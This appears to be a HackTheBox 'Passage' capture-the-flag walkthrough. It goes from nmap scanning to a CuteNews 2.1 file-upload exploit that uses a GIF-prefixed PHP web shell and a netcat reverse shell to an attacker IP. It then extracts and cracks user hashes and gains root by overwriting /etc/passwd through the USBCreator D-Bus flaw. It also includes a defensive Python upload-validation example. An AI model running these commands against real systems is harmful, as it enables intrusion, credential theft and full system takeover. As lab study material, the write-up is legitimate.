Passage


HTB Linux

nmap -A -p- -oA output 10.129.150.170 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA passage 10.129.150.170

nmap -sU -O -p- -oA passage-udp 10.129.150.170

nikto -h 10.129.150.170:80

whatweb http://10.129.150.170

nmap --script http-enum -p80 10.129.150.170 -oN webScan -Pn

http://10.129.150.170

We see CuteNews

http://10.129.150.170/CuteNews

searchsploit CuteNews 2.1

http://10.129.150.170/CuteNews/?register

searchsploit -m 48800

cat cmd.php

ghex cmd.php

We add GIF8; to the beginning of the file

file cmd.php

http://10.129.150.170/CuteNews/index.php

We edit our profile

We click "Browse" and upload the file cmd.php
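
Seen from the server side, the steps above work when the avatar check trusts the leading bytes and keeps the client's file name and extension. The following Python check is an added example, not part of the original write-up and not CuteNews code; the function names, the GIF-only allowlist, the 512-pixel limit and the sample bytes are assumptions constructed for illustration.

```python
import os
import re
import secrets

# Full GIF signatures. The 5-byte "GIF8;" prefix from the write-up matches neither.
GIF_SIGNATURES = (b"GIF87a", b"GIF89a")
ALLOWED_EXTENSIONS = {".gif"}  # assumption: this sketch accepts GIF avatars only
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)  # heuristic, not a parser
MAX_SIDE = 512  # assumed avatar size limit in pixels


def naive_is_image(data):
    """Weak check: trust only the first four bytes."""
    return data.startswith(b"GIF8")


def avatar_rejection_reasons(filename, data):
    """Return why an uploaded avatar should be refused; an empty list means accept."""
    reasons = []
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        reasons.append("extension %r not in allowlist" % ext)
    if not data.startswith(GIF_SIGNATURES):
        reasons.append("missing full GIF87a/GIF89a signature")
    elif len(data) < 13:
        reasons.append("truncated GIF header")
    else:
        # Logical screen width/height are little-endian 16-bit fields at offset 6.
        width = int.from_bytes(data[6:8], "little")
        height = int.from_bytes(data[8:10], "little")
        if not (0 < width <= MAX_SIDE and 0 < height <= MAX_SIDE):
            reasons.append("implausible dimensions %dx%d" % (width, height))
    if PHP_OPEN_TAG.search(data):
        reasons.append("PHP open tag in file body")
    return reasons


def stored_name():
    """Server-chosen name: nothing from the client's filename or extension survives."""
    return secrets.token_hex(16) + ".gif"


# Constructed samples, not taken from the box.
POLYGLOT = b"GIF8;\n<?php echo 'marker'; ?>"
REAL_GIF = b"GIF89a" + b"\x01\x00\x01\x00" + b"\x00\x00\x00" + b";"

if __name__ == "__main__":
    print(naive_is_image(POLYGLOT))                        # weak check accepts it
    print(avatar_rejection_reasons("cmd.php", POLYGLOT))   # strict check refuses
    print(avatar_rejection_reasons("me.gif", REAL_GIF))    # clean file passes
```

Content checks are only one layer; serving the upload directory with PHP execution disabled is what stops an uploaded script from running.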

echo "10.129.150.170 passage.htb" | sudo tee -a /etc/hosts

http://10.129.150.170/CuteNews/uploads/avatar_cu3rv0x_cmd.php?cmd=nc -e /bin/bash 10.10.14.45 443

nc -lvnp 443

shred -zun 10 -v avatar_cu3rv0x_cmd.php

Then we log in

https://github.com/CuteNews/cutenews-2.0

We look at how CuteNews is structured

cd /var/www/html/CuteNews/cdata/users

We start a Python shell

import hashlib

hashlib.md5(b"cu3rv0x").hexdigest()

We see that the first two digits are 22.

So we cat 22.php, which holds the information for cu3rv0x, since CuteNews does not use a database.

cat * | grep -v "denied" | base64 -d; echo

We create a file credentials.txt and put the credentials in it.

vim credentials.txt

cat credentials.txt | awk '{print $2}' FS=":"

cat credentials.txt | awk '{print $2}' FS=":" | xclip -sel clip

We go to CrackStation and enter the credentials

credentials -> paul:atlanta1

su paul

cd ~/.ssh

cat authorized_keys

grep "sh$" /etc/passwd

lsattr

ssh nadav@localhost

whoami

id

ls -al

cat .viminfo

https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/file.txt /file.txt true

cp /etc/passwd .

openssl passwd

We create a password. I used "test"

In passwd we change the x to 9AyQs.WYSYTuE

And we save the file

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/passwd /etc/passwd true

su root

We enter the password we created with openssl

© 2025 Cu3rv0x